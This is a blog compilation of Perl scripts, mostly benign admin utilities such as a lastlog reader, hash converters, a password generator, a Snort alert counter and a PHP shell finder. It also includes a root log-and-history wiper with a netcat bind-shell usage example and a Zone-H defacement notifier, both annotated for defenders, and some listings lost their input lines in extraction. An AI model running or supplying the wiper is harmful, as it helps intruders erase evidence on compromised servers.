
Lastlog script for Solaris

Nombre: lastlog.pl
Autor: ph
Visto en: Tech Notes
#!/usr/local/bin/perl

# month names for common usage

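# Month abbreviations indexed by localtime()'s zero-based month field.
my @months = qw(Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec);

# Build a UID -> login-name map from the passwd database.  When several
# accounts share a UID, the entry getpwent returns last wins.
my %names;
setpwent;
while (my ($name, $junk, $uid) = getpwent) {
        $names{$uid} = $name;
}
endpwent;

# The file is read as fixed-size binary records, one per UID, in UID order.
# 'l A8 A16' is 4 + 8 + 16 = 28 bytes: login time, terminal line, remote host.
# NOTE(review): this layout is the one the original author assumed for
# Solaris; confirm it against the target system before trusting the output.
my $lastlog_path = '/var/adm/lastlog';
my $record_size  = 28;

# Three-argument open plus an explicit check: without it a missing or
# unreadable file produced an empty report that looked like "nobody logged in".
open(my $lastlog, '<', $lastlog_path)
    or die "Cannot open $lastlog_path: $!\n";
binmode($lastlog);

my $record;
for (my $uid = 0; (read($lastlog, $record, $record_size) || 0) == $record_size; $uid++) {
    my ($time, $line, $host) = unpack('l A8 A16', $record);
    next unless $time;    # a zero timestamp means this UID never logged in

    $host = "($host)" if $host;
    my ($sec, $min, $hour, $mday, $mon, $year) = localtime($time);

    # A record whose UID no longer maps to an account is still worth showing
    # during a review, so fall back to the numeric UID instead of a blank.
    my $who = defined $names{$uid} ? $names{$uid} : $uid;

    printf "%-9s%-8s%s %2d %4d    %s\n",
        $who, $line, $months[$mon], $mday, 1900+$year, $host;
}
close($lastlog);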

BH-Linux Server Cleaner

Nombre: BH-Linux Server Cleaner
Autor: Br4v3-H34r7
Visto en Shipcode's Misadventures
#!/usr/bin/perl
#==============================================================#
# BH-LSC 1.0 (BH-Linux Server Cleaner Version 1.0)
# Coded By: Br4v3-H34r7
# Contact: R00T[AT]Br4v3-H34r7[DOT]CoM
# Website: Br4v3-H34r7.CoM | BH2H.CoM
# License: GNU General Public License 3
#==============================================================#
# NOT FOR ILLEGAL USAGE - NOT FOR SCRIPT KIDDIES
#==============================================================#
# BEGIN THE CODE
# Reading notes for defenders (the code below is unchanged).
#
# Purpose: an anti-forensics script.  When run as root it unlinks a fixed list
# of system, service and accounting logs plus root's shell history files,
# optionally after a delay, and then hands an operator-supplied string to the
# shell via system().  This corresponds to MITRE ATT&CK T1070.002 (clear
# Linux/Mac system logs) and T1070.003 (clear command history).
#
# What to look for / how to blunt it:
#   - Ship logs off-host as they are written; a local unlink cannot reach them.
#   - Audit or file-integrity-monitor deletions under /var/log, /var/run/utmp,
#     /etc/wtmp and root's dotfiles, and alert on sudden gaps in wtmp/lastlog.
#   - Alert on an iptables flush followed by default DROP policies (option 4).
#   - unlink's return value is never checked here, so the "Deleted
#     Successfully" messages are printed unconditionally; during response,
#     verify which artefacts are actually missing rather than trusting them.
#
# The page extraction dropped the input expression from every
# "chomp($var = );" line, so the listing does not parse as shown.
{
 $uid = getpwuid($>); # Login name of the effective UID (getpwuid in scalar context)
 if($uid eq "root") # If root
 {
  # Paths targeted for deletion: authentication, mail, web, FTP, news, IDS and
  # process-accounting logs, plus the utmp/wtmp/lastlog login records.
  @logs = ("/var/log/lastlog", "/var/log/messages", "/var/log/warn", "/var/log/wtmp", "/var/log/poplog", "/var/log/qmail", "/var/log/smtpd", "/var/log/telnetd", "/var/log/secure", "/var/log/auth", "/var/log/auth.log", "/var/log/cups/access_log", "/var/log/cups/error_log", "/var/log/thttpd_log", "/var/log/spooler", "/var/spool/tmp", "/var/spool/errors", "/var/spool/locks", "/var/log/nctfpd.errs", "/var/log/acct", "/var/apache/log", "/var/apache/logs", "/usr/local/apache/log", "/usr/local/apache/logs", "/usr/local/www/logs/thttpd_log", "/var/log/news", "/var/log/news/news", "/var/log/news.all", "/var/log/news/news.all", "/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice", "/var/log/news/suck.err", "/var/log/news/suck.notice", "/var/log/xferlog", "/var/log/proftpd/xferlog.legacy", "/var/log/proftpd.xferlog", "/var/log/proftpd.access_log", "/var/log/httpd/error_log", "/var/log/httpsd/ssl_log", "/var/log/httpsd/ssl.access_log", "/var/adm", "/var/run/utmp", "/etc/wtmp", "/etc/utmp", "/etc/mail/access", "/var/log/mail/info.log", "/var/log/mail/errors.log", "/var/log/httpd/*_log", "/var/log/ncftpd/misclog.txt", "/var/account/pacct", "/var/log/snort", "/var/log/bandwidth", "/var/log/explanations", "/var/log/syslog", "/var/log/user.log", "/var/log/daemons/info.log", "/var/log/daemons/warnings.log", "/var/log/daemons/errors.log", "/etc/httpd/logs/error_log", "/etc/httpd/logs/*_log", "/var/log/mysqld/mysqld.log"); # Logs Locations
  # Root's interactive traces: shell histories, login/logout scripts, X cookie.
  @shells_history = ("/root/.ksh_history", "/root/.bash_history", "/root/.sh_history", "/root/.history", "/root/*_history", "/root/.login", "/root/.logout", "/root/.bash_logut", "/root/.Xauthority"); # Shells History Locations
  # Array compared as a string in scalar context: true when no arguments were given.
  if(@ARGV eq 0)
  {
   print "\n\t+--------------------------+\n";
   print "\t|        BH-LSC 1.0        |\n";
   print "\t|   Coded By Br4v3-H34r7   |\n";
   print "\t| Br4v3-H34r7.CoM|BH2H.CoM |\n";
   print "\t+--------------------------+\n\n";
   
   print "[*] FastMode Usage: perl $0 [Seconds] [Command(s)]\n";
   print "[*] EXAMPLE: perl $0 30 \"nc -l -p 3434 -e /bin/bash\"\n\n";
   
   print "[+] Start Clean The Server? (Y/N): ";
   chomp($Clean = ); # Get The Answer
   $LClean = "\L$Clean"; # Make User Input Lowercase Character
    if($LClean eq "y") # Answer Yes
    {
     print "[+] Clean The Server After You Exit? (Y/N): ";
     chomp($AfterExit = ); # Get The Answer
     $LAfterExit = "\L$AfterExit"; # Make User Input Lowercase Character
     if($LAfterExit eq "y") # Answer Yes
     {
      print "[+] After How Many Time? (Seconds): ";
      chomp($Seconds = ); # Get The Seconds
      
      print "[+] Run Custom Command After Cleaning The Logs? (Y/N): ";
      chomp($RunAfter = ); # Get The Answer
      $LRunAfter = "\L$RunAfter"; # Make User Input Lowercase Character
       if ($LRunAfter eq "y") # Answer Yes
       {
        print "    (1) Make This Tool Remove It Self\n";
        print "    (2) Delete Custom File From The Server\n";
        print "    (3) Get File To The Server (Using \"wget\")\n";
        print "    (4) Don't Allow Any Server Connections (Using \"iptables\" Firewall)\n";
        print "    (5) Use Other Or Multi Commands (Use \";\" Between The Commands)\n";
        
        print "[+] Enter The Number Of Your Choice: ";
        chomp($theanswer = ); # Get The Answer
        # Every branch below only builds a string in $command; it is executed
        # by the single system() call after the deletions.
         if($theanswer eq 1) # Make This Tool Remove It Self
         {
          use Cwd qw(realpath);
          $toolpath = realpath($0); # Get The Tool Name
          $command = ("rm -rf \"$toolpath\""); # Set After Exit Command
         } 
         elsif($theanswer eq 2) # Delete Custom File From The Server
         {
          print "[+] Enter File Location: ";
          chomp($file = ); # Get File Location
          $command = ("rm -rf \"$file\""); # Set After Exit Command
         }
         elsif($theanswer eq 3) # Get File To The Server
         {
          print "[+] Enter File URL: ";
          chomp($wget_url = ); # Get File URL
          print "[+] Enter Save Location: ";
          chomp($wget_location = ); # Get Save Location
          $command = ("wget -O $wget_location $wget_url"); # Set After Exit Command
         }
         elsif($theanswer eq 4) # Don't Allow Any Server Connections
         {
          print "[+] DANGEROUS This Choice Will Make The Server Drop INPUT/OUTPUT/FORWARD Connections (Y/N): ";
          chomp($answer5 = ); # Get The Answer
          $Lanswer5 = "\L$answer5"; # Make User Input Lowercase Character
           if ($Lanswer5 eq "y") # Answer Yes
           {
            # Flushes all rules, then sets every built-in chain's policy to DROP.
            $command = ("/sbin/iptables -F;/sbin/iptables -P INPUT DROP;/sbin/iptables -P OUTPUT DROP;/sbin/iptables -P FORWARD DROP"); # Set After Exit Command
           }
           else # Error Input
           {
            print "[!] Error: Wrong Input... Skipped!\n";
           }
         } 
         elsif($theanswer eq 5) # Use Other Or Multi Commands
         {
          print "[+] Enter The Command(s): ";
          chomp($command = ); # Set After Exit Command
         }
         else # Error Input
         {
          print "[!] Error: Wrong Input... Skipped!\n";
         } 
       }
       elsif($LRunAfter eq "n") # Answer No
       {
        print "[-] Answer No, Run Custom Command After Cleaning The Logs... Skipped!\n";
       }
       else # Error Input
       {
        print "[!] Error: Wrong Input... Skipped!\n";
       }
       # The delay is the window in which the operator is expected to log out,
       # so the deletions run after the session has ended.
       print "[+] You Have \"$Seconds\" Seconds To Exit The Server\n";
       sleep $Seconds; # Wait For Some Seconds
     } 
     elsif($LAfterExit eq "n") # Answer No
     {
      print "[-] Answer No, Delete Server Logs After Exit... Skipped!\n";
     }
     else # Error Input
     {
      print "[!] Error: Wrong Input... Skipped!\n";
     }
      print "[+] Start Cleaning The Server...\n";
      sleep 2; # Wait For 2 Seconds
      
      # The result of unlink is discarded; the message that follows is printed
      # whether or not anything was removed.
      unlink @logs; # Deleting System Logs
      print "[+] Server Logs Deleted Successfully\n";
      sleep 2; # Wait For 2 Seconds
      
      unlink @shells_history; # Deleting Shells History
      print "[+] Shells History Deleted Successfully\n\n";
      
      # Single-string system(): the text goes through the shell, as root.
      system $command; # Run The Command
    }
    elsif($LClean eq "n") # Answer No
    {
     print "[-] Answer No, Exit With Out Cleaning... Exit!\n";
    }
    else # Error Input
    {
     print "[!] Error: Wrong Input... Exit!\n";
    }
  }
  else # FastMode
  {
   # Non-interactive path: the delay and the command come straight from the
   # command line, so both are visible in process listings and execve audit
   # records while the script sleeps.
   sleep $ARGV[0]; # Wait For Some Seconds
   unlink @logs; # Deleting System Logs
   unlink @shells_history; # Deleting Shells History
   system $ARGV[1]; # Run The Command(s)
  }
 }
 else # If Not root
 {
  print "[!] Error: You Must Be Server \"root\" To Use This Tool... Exit!\n";
 }
} 
# END THE CODE
#==============================================================#

ListaModulos.pl

Nombre: ListaModulos.pl
Autor: Desconocido
Visto en: davioth
#!/usr/bin/perl
use strict;
use ExtUtils::Installed;

# Inventory object over the modules recorded as installed for this perl.
my $instmod = ExtUtils::Installed->new();

# Print one "name version" line per module; a false (missing or empty)
# version is shown as "???".  The list is a quick input for checking
# installed versions against security advisories.
for my $module ($instmod->modules()) {
      my $version = $instmod->version($module);
      $version = "???" unless $version;
      print $module, " ", $version, "\n";
}

Convertstr.pl -Reverses and converts a string

Autor: Dual
Descripción: Reverses and converts a string to base64, binary, hex, and rot13 and provides  the md5, sha1 and sha256 hashes 
Nombre: convertstr.pl


#!/usr/bin/env perl -w

# convertstr.pl - Reverses and converts a string
# to base64, binary, hex, and rot13 and provides
# the md5, sha1 and sha256 hashes 
#
# by dual

use strict;
use MIME::Base64;
use Digest::MD5;
use Digest::SHA qw(sha1_hex sha256_hex);

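# Usage text.  The argument placeholder had been lost from the last line and
# "Usage" was misspelled.
my $usage = "convertstr.pl - Reverses and converts a string
to base64, binary, hex and rot13, and provides
the md5, sha1 and sha256 hashes
Usage: perl convertstr.pl <string>
";

# Get and check args.  Testing definedness and length (not truth) lets the
# string "0" through.  The string arrives on the command line, so it is
# visible in the process list and shell history: do not feed secrets this way.
my $string = shift;
print $usage and exit unless (defined($string) && length($string));
chomp($string);

# Print header
print "Converting \'$string\'...\n\n";

# Reverse
print "REVERSED:\n";
my $reversed = reverse($string);
print $reversed . "\n\n";

# Base64.  The empty second argument disables encode_base64's line wrapping,
# so long inputs come out as one line rather than with embedded newlines.
print "BASE64:\n";
my $base64 = encode_base64($string, '');
print $base64 . "\n\n";

# Binary
print "BINARY:\n";
my $binary = unpack('B*', $string);
print $binary . "\n\n";

# Hex
print "HEX:\n";
my $hex = unpack('H*', $string);
print $hex . "\n\n";

# Rot13 (letters and whitespace only)
print "ROT13:\n";
if ($string =~ /[^A-Za-z\s]/) {
  print ">>> String must be alphabetic\n\n";
}
else {
  my $rot13 = $string;
  $rot13 =~ tr/A-Za-z/N-ZA-Mn-za-m/;
  print $rot13 . "\n\n";
}

# Digests.  These are plain unsalted hashes: fine as checksums or lookup
# keys, unsuitable for storing passwords.  MD5 and SHA-1 are also no longer
# collision-resistant, so prefer the SHA-256 value for integrity checks.

# MD5
print "MD5:\n";
my $md5 = Digest::MD5->new;
$md5->add($string);
my $md5hex = $md5->hexdigest;
print $md5hex . "\n\n";

# SHA1
print "SHA1:\n";
my $sha1hex = sha1_hex($string);
print $sha1hex . "\n\n";

# SHA256
print "SHA256:\n";
my $sha256hex = sha256_hex($string);
print $sha256hex . "\n\n";

# Close out
print "Done.\n";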

Base64pl.pl Encode/Decode

Autor: Dual
Descripción: Encode / Decode strings usando base64
Nombre: base64pl.pl

#!/usr/bin/env perl -w

# base64pl.pl - Encodes/decodes string(s) using base64
# by dual

use strict;
use MIME::Base64;

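my $opt;
# The usage line had been mangled by the blog's HTML escaping (it contained a
# stray attribute with double quotes that ended the Perl string early).
my $usage = "base64pl.pl -
Encodes or decodes a string using base64
Usage: perl base64pl.pl <-e|-d> <string> [string ...]
-e => encode
-d => decode
";

# First argument must be exactly -e or -d; at least one string must follow.
print $usage and exit unless (defined($opt = shift) && $opt =~ /\A(?:-e|-d)\z/);
print $usage and exit unless (@ARGV);

# Apply the selected operation to each remaining argument in order.
my $handler = ($opt eq '-e') ? \&encode : \&decode;
for my $item (@ARGV) {
  $handler->($item);
}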

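# Print "<input>: <base64>" for one string.
#   $_[0]  the string to encode
# The empty second argument to encode_base64 turns off its line wrapping;
# with the default, a long input produced base64 with embedded newlines
# and only the final one was removed by chomp.
sub encode {
  my $string = $_[0];
  my $encoded = encode_base64($string, '');
  print "$string: $encoded\n";
}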

# Print "<input>: <decoded>" for one base64 string.
#   $_[0]  the base64 text to decode
# One trailing newline is stripped from the decoded data before printing.
# The decoded bytes are written to the terminal as they are, so decoding
# input you did not produce can emit control characters; pipe the output
# through a hex viewer when the source is not trusted.
sub decode {
  my ($string) = @_;
  my $decoded = decode_base64($string);
  chomp $decoded;
  print $string, ": ", $decoded, "\n";
}

Fuente

Zone-H Reporter Perl

Autor: PrinceofHacking Descripción: Script realizado en Perl que nos permite interactuar con ZOne-H para reportar.


#!/usr/bin/perl
 
#####################################
#                Zone-H Notify                                          #                                 
#####################################
 
############
use LWP::UserAgent;
############
# Reading notes (the code below is unchanged).
#
# A menu-driven client that submits website-defacement notifications to the
# Zone-H archive: it POSTs a nickname and a URL to the notify form over plain
# HTTP and prints the text the site returns.  Mode 2 repeats that for every
# line of a local file named owned.txt.
#
# For defenders: a copy of this script or an owned.txt list on a host, or
# outbound POSTs to the URL in $U from a server, are worth treating as
# indicators that the host was used to publicise compromises.
#
# The page extraction dropped the input expressions ("$pick=;", "$Def=;",
# "$Dom=;", "@ARRAY=;"), so the listing does not parse as shown.
system('cls');
system ('title Powered By PrinceofHacking');
############
 
print "                         #####################\n   ";
print "                      #    Zone-Notify    #\n  ";
print "                       #        USO        #\n  ";
print "                       # [1] Single Deface #\n";
print "                         # [2] Mass   Deface #\n";
print "                         # [3] Help & About  #\n";
print "                         #####################\n\n   ";
 
# Menu choice; only values above 3 are reported as unknown.
$pick=;
if ($pick>3) {
print "Unknown Command\n";
}
if ($pick ==1)
{
 
print "Mode : Single Deface\n\n";
print "Defacer [Nickname] :\n";
$Def=;
print "Dominio:\n";
$Dom=;
# The two branches differ only in whether "http://" is prepended to the input.
if ($Dom =~ /http:\/\//)
{
$U="http://zone-h.org/notify/single";
$lwp=LWP::UserAgent->new;
$res=$lwp  -> post($U,[
'defacer'     => $Def,
'domain1'   => $Dom,
'hackmode' => '15',
'reason'       => '1',
'submit'       => 'Send',
]);
# The status shown to the user is scraped from the red-coloured list item in
# the response HTML; anything else is reported as "Error".
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print "Result => $1";
}
else
{
print "Error\n";
}
}
else
{
$new="http://" . "$Dom";
$U="http://zone-h.org/notify/single";
$lwp=LWP::UserAgent->new;
$res=$lwp  -> post($U,[
'defacer'     => $Def,
'domain1'   => $new,
'hackmode' => '15',
'reason'       => '1',
'submit'       => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print "Result => $1";
}
else
{
print "Error\n";
}
}
}
#############################################Mass###########################################
if ($pick == 2){
print "Mode : Mass Deface\n\n";
# Two-argument open on a bareword handle, result unchecked.
open(site,"owned.txt");
 
@ARRAY=;
 
close site;
print "Defacer [Nickname] :\n";
$Def=;
# One POST per entry of the list, with "http://" prepended where missing.
foreach $mass(@ARRAY){
if ($mass !~ /http:/) {
$mass='http://' . $mass;
}
print "$mass\n";
 
$U="http://zone-h.org/notify/single";
$lwp=LWP::UserAgent->new;
$res=$lwp  -> post($U,[
'defacer'     => $Def,
'domain1'   => $mass,
'hackmode' => '15',
'reason'       => '1',
'submit'       => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print "Result => $1\n\n";
}
else
{
print "Error\n";
}
}
}
#####################About##############
# Help text: describes the owned.txt format expected by option 2.
if ($pick ==3)
{
print "Para la opcion [2] crear un texto con las paginas y guardarlo como : owned.txt\n";
print "Example\n";
print "http://link.com\n";
print "http://link2.com\n";
print "http://link3.com\n\n";
}

show_tech-support.pl

Nombre: show_tech-support.pl
Autor: @Tonejito
Descripción: Script que recoge información de un sistema Debian GNU/Linux para soporte técnico
#!/usr/bin/perl
#	= ^ . ^ =
#	show_tech-support.pl
#	Show technical support about a Debian GNU/Linux System
#
#	This script is released under the BSD license
#
#	Copyright (c) 2012, Andrés Hernández (Tonejito)
#	All rights reserved.
#	
# Redistribution and use in source and binary forms, with or without 
# modification, are permitted provided that the following conditions are met:
#	
#	1. Redistributions of source code must retain the above copyright 
#	notice, this list of conditions and the following disclaimer.
#
#	2. Redistributions in binary form must reproduce the above copyright 
#	notice, this list of conditions and the following disclaimer in the 
#	documentation and/or other materials provided with the distribution.
#
#	3. Neither the name of the project nor the names of its contributors 
#	may be used to endorse or promote products derived from this software 
#	without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF 
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS 
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN 
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) 
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
# POSSIBILITY OF SUCH DAMAGE.

use strict;
use warnings;

package ssi;

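# Not referenced anywhere in the visible code; kept so nothing else breaks.
my $PREFIX="[${0}	";
my $SUFFIX="]\n";

# Separator printed before each command's section of the report.
my $PADDING="#-------#-------#-------#-------#-------#-------#-------#-------#-------#-------";

# Commands to run, in report order.  CMD is looked up with which(1); ARGS,
# when present, is appended verbatim and the line goes through the shell, so
# the globs below are expanded by the shell.
#
# Handle the resulting report as sensitive: it includes the full environment
# (which may hold credentials), the account and group databases, every crontab
# under /var/spool/cron, listening sockets with owning processes, firewall
# rules and the package inventory.  Redact it before attaching it to a ticket
# or sending it outside the organisation.
my @tests =
(
	{ CMD => "env" },
	{ CMD => "hostname" },
	{ CMD => "hostname",    ARGS => "-f" },
	{ CMD => "cat",         ARGS => "/proc/version" },
	{ CMD => "uname",       ARGS => "-a" },
	{ CMD => "lsb_release", ARGS => "-a" },
	# NOTE(review): ulimit is normally a shell builtin, so which(1) may find
	# nothing and this entry is then skipped without any message.
	{ CMD => "ulimit",      ARGS => "-a" },
	{ CMD => "cat",         ARGS => "/etc/fstab" },
	{ CMD => "mount" },
	{ CMD => "df",          ARGS => "-m" },
	{ CMD => "ls",          ARGS => "-l /lib*/libc-*.so /lib*/libc.so*" },
	{ CMD => "lsmod" },
	{ CMD => "free",        ARGS => "-m" },
	{ CMD => "cat",         ARGS => "/proc/cpuinfo" },
	{ CMD => "cat",         ARGS => "/proc/meminfo" },
	{ CMD => "cat",         ARGS => "/proc/swaps" },
	{ CMD => "cat",         ARGS => "/etc/network/interfaces" },
	{ CMD => "cat",         ARGS => "/etc/resolv.conf" },
	{ CMD => "nm-tool" },
	{ CMD => "ifconfig",    ARGS => "-a" },
	{ CMD => "ip",          ARGS => "addr" },
	{ CMD => "route",       ARGS => "-n -A inet" },
	{ CMD => "route",       ARGS => "-n -A inet6" },
	{ CMD => "netstat",     ARGS => "-ntulp" },
	{ CMD => "netstat",     ARGS => "-natuplw" },
	{ CMD => "iptables",    ARGS => "-nL" },
	{ CMD => "ip6tables",   ARGS => "-nL" },
	{ CMD => "getent",      ARGS => "passwd" },
	{ CMD => "getent",      ARGS => "group" },
	{ CMD => "ps",          ARGS => "afx" },
	{ CMD => "find",        ARGS => "/var/spool/cron -type f -ls -exec /bin/cat {} \\;" },
	{ CMD => "find",        ARGS => "/etc/rc.d/* /etc/rc.d/rc?.d/* /etc/rc?.d/* /etc/rc.local -ls" },
	{ CMD => "sysctl",      ARGS => "-a" },
	{ CMD => "cat",         ARGS => "/etc/apt/sources.list /etc/apt/sources.list.d/*" },
	{ CMD => "dpkg",        ARGS => "--list" },
	{ CMD => "dpkg",        ARGS => "--get-selections" },
	{ CMD => "lshw" },
);

print "# ${0}\n";

for my $test ( @tests )
{
	next unless (exists $test->{CMD});

	# Get full path of the program.  The lookup uses the caller's PATH, so
	# when this runs as root make sure PATH holds only root-owned
	# directories; otherwise a look-alike binary earlier in PATH would be
	# the one executed.
	my $CMD = $test->{CMD};
	my $WHICH = `which $CMD`;
	my $STATUS = $?;
	# Backticks return undef when the command cannot be started at all.
	$WHICH = "" unless (defined $WHICH);
	chomp ($CMD = $WHICH) if (!$STATUS);

	# bail out: program not installed (or not in PATH)
	next if ($WHICH eq "");

	# concatenate arguments if present
	$CMD .= " ".$test->{ARGS} if (exists $test->{ARGS});

	# Execute program.  STATUS is the raw wait status from $?, not the
	# exit code (which is $? >> 8).
	my $OUTPUT = `$CMD`;
	$STATUS = $?;
	$OUTPUT = "" unless (defined $OUTPUT);
	print "$PADDING\n";
	print "# $CMD\n";
	print "#\t$STATUS\n";
	print "$OUTPUT";
}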

RandomPasswordGenerator.pl

Nombre: RandomPasswordGenerator.pl
Autor: Attack Vector
Descripción: Script que permite crear passwords aleatorios.
Visto en Perl Code
#!/usr/bin/perl
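# Generates pronounceable passwords of the form cvc99cvc (consonant, vowel,
# consonant, two digits/symbols, consonant, vowel, consonant).
# Usage: RandomPasswordGenerator.pl <count>

# Require a positive whole number; a missing or non-numeric argument used to
# fall through and print nothing.
if (!defined($ARGV[0]) || $ARGV[0] !~ /^[0-9]+$/ || $ARGV[0] < 1) {
        print "You must enter the number of passwords you want created.\n";
        exit(0);
}
$howMany = $ARGV[0] - 1;

# Seed for the rand() fallback only.  A seed built from the clock and the
# process ID can be guessed by anyone who knows roughly when the script ran,
# and rand() is not a cryptographic generator, so random choices are taken
# from the kernel CSPRNG whenever /dev/urandom can be opened.
srand(time() ^ ($$ + $$ << 21));

my $urandom;
my $haveUrandom = open($urandom, '<', '/dev/urandom') ? 1 : 0;
if ($haveUrandom) {
    binmode($urandom);
} else {
    warn "WARNING: /dev/urandom is unavailable; falling back to rand(), "
       . "whose output is predictable. Do not rely on these passwords.\n";
}

# Return a uniformly distributed integer in 0 .. $limit-1.
# Reads 16 bits at a time and rejects values in the incomplete top range so
# the modulo does not favour the low indexes.
sub randomBelow {
    my ($limit) = @_;
    return 0 if ($limit < 1);
    return int(rand($limit)) unless ($haveUrandom);
    my $ceiling = 65536 - (65536 % $limit);
    while (1) {
        my $raw;
        my $got = read($urandom, $raw, 2);
        die "Short read from /dev/urandom\n" unless (defined($got) && $got == 2);
        my $value = unpack('n', $raw);
        return $value % $limit if ($value < $ceiling);
    }
}

$siz = 7;
$siz = 3 if ($siz < 3);    # smaller sizes can never satisfy the checks below

$addConsonants = 1;
$firstUpper = 1;
$mixedCase = 0;
$symbolOdds = 7;
$across = 0;

# Single quotes: inside double quotes "$%" is interpolated as a Perl
# variable, which silently replaced those two symbols in the set.
$sym = '~`!@#$%^&*()-_+=,.<>';
$numb = "12345678901234567890" . $sym;
$lnumb = length($numb);
$upr = "BCDFGHJKLMNPQRSTVWXYZbcdfghjklmnpqrstvwxyz";
$cons = "bcdfghjklmnpqrstvwxyz";

if ($mixedCase) {
    $vowel = "AEIOUaeiou";
    $cons = $upr;
} else {
    $vowel = "aeiou";
}
$upr = $cons unless ($firstUpper);
$lvowel = length($vowel);
$lcons = length($cons);
$lupr = length($upr);

# Longest password kept after generation; extra consonants add up to two.
$realSize = $siz;
$realSize += 2 if ($addConsonants);
($across) ? ($down = "  ") : ($down = "\n");
$linelen = 0;

for ($j=0; $j<=$howMany; $j++) {
   $pass = "";
   $k = 0;    # extra consonants added so far (at most 2)
   for ($i=0; $i<=$siz; $i++) {
      # Consonant positions; 0 and 5 draw from $upr (possibly upper case).
      if ($i==0 or $i==2 or $i==5 or $i==7) {
         if ($i==0 or $i==5) {
            $pass .= substr($upr,randomBelow($lupr),1);
         } else {
            $pass .= substr($cons,randomBelow($lcons),1);
         }
         if ($addConsonants and (randomBelow(4) == 3) and $k < 2) {
            $pass .= substr($cons,randomBelow($lcons),1);
            $k++;
         }
      }

      # Padding letters when $siz is above 7.
      if ($i > 7) {
          if (randomBelow(26) <= 5) {
             $pass .= substr($vowel,randomBelow($lvowel),1);
          } else {
             $pass .= substr($cons,randomBelow($lcons),1);
          }
      }

      # Vowel positions.
      $pass .= substr($vowel,randomBelow($lvowel),1)
         if ($i==1 or $i==6);

      # Digit/symbol positions.
      if ($i==3 or $i==4) {
         if ($symbolOdds) {
            $pass .= substr($numb,randomBelow($lnumb),1)
               if (randomBelow(10) <= $symbolOdds);
         } else {
            $n = "";
            until ($n =~ /[0-9]/) {
               $n = substr($numb,randomBelow($lnumb),1);
            }
            $pass .= $n;
         }
      }
   }

   # Reject candidates with two adjacent symbols, or lacking a digit, a
   # lower-case letter or (when required) an upper-case letter.  "$" and "@"
   # are escaped so the class matches them literally.
   $skipThisOne = 0;
   $skipThisOne = 1 if ($pass =~ /[~`!\@#\$%^&*()\-_+=,.<>]{2}/);
   $skipThisOne = 1 unless ($pass =~ /[0-9]/);
   $skipThisOne = 1 unless ($pass =~ /[a-z]/);
   $skipThisOne = 1
      if (!($pass =~ /[A-Z]/) and ($firstUpper or $mixedCase));
   if ($skipThisOne) {
      $j--;    # cancelled out by the loop increment: retry this slot
      next;
   }
   $pass = substr($pass,0,$realSize) if (length($pass) > $realSize);

   # In "across" mode, wrap before a line would exceed 79 columns.
   if ($down ne "\n") {
      if ($linelen + length($pass) + length($down) > 79) {
         print "\n";
         $linelen = 0;
      }
      $linelen += length($pass) + length($down);
   }
   print "$pass$down";

}
print "\n" if $down ne "\n";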


Snort alert log parser

Nombre: snort-alert.pl
Autor: Attack Vector
Descripción: Script que permite visualizar cuántas alertas detectó snort por cada evento.
Visto en Perl Code
#!/usr/bin/perl -w

use strict;

#[**] [1:2925:3] INFO web bug 0x0 gif attempt [**]
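# Hit counter keyed by alert message.
my %h = ();

# Sort comparator: most hits first, alert text as tie-break so the report is
# stable between runs.
sub desc {
   $h{$b} <=> $h{$a} or $a cmp $b;
}

my $alert_file = "/var/log/snort/alert";
open(F, '<', $alert_file) || die "Cannot open $alert_file: $!\n";

# Read the log line by line (the read from F had been lost from the listing,
# leaving a loop that never touched the file).  On an alert header line the
# capture is the text between the "[gid:sid:rev]" field and the closing "[**]".
while (my $entry = <F>) {
        if ($entry =~ /^.*?\]\s+(.*?)\s+\[.*/) {
                $h{$1}++;
        }
}

close(F);

# Alert text comes from rule "msg" fields and is printed as-is.
foreach my $line (sort desc (keys (%h))) {
        print "Attack: $line - Hits: $h{$line}\n";
}

exit 0;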

Permisos: chmod 700 snort-alert.pl 
Ejecución: ./snort-alert.pl

findshell.pl

Nombre: findshell.pl
Autor: traps.darkmindz.com
Descripción: Script que permite detectar shells php
Hace uso del módulo File::Find
Visto en: ketan.lithiumfox.com
#!/usr/bin/perl -w
# findshell v1.0 == code taken/modified from traps.darkmindz.com
#usage: ./findshell.pl [ sensitivity 1-50 ] [ directory to scan ]
use strict;
use File::Find;
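my $sens = shift  || 10;
my $folder = shift || './';

# Patterns are compiled once here, before find() starts calling backdoor().
#maybe evil stuffs: PHP functions that are common in shells but also in
#legitimate code (1 point per matching line)
my $maybe_re = qr/function_exists\(|phpinfo\(|safe_?mode|shell_exec\(|popen\(|passthru\(|system\(|myshellexec\(|exec\(|getpwuid\(|getgrgid\s*\(|fileperms\(/i;
#probably evil stuffs: request data flowing into execution, and names of
#well-known shells (50 points per matching line)
my $probably_re = qr/\`\$\_(post|request|get).{0,20}\`|(include|require|eval|system|passthru|shell_exec).{0,10}\$\_(post|request|get)|eval.{0,10}base64_decode|back_connect|backdoor|r57|PHPJackal|PhpSpy|GiX|Fx29SheLL|w4ck1ng|milw0rm|PhpShell|k1r4|FeeLCoMz|FaTaLisTiCz|Ve_cENxShell|UnixOn|C99madShell|Spamfordz|Locus7s|c100|c99|x2300|cgitelnet|webadmin|cybershell|STUNSHELL|Pr!v8|PHPShell|KaMeLeOn|S4T|oRb|tryag|sniper|noexecshell|\/etc\/passwd|revengans/i;
# PHP markers that should not appear in images, archives or PDFs.
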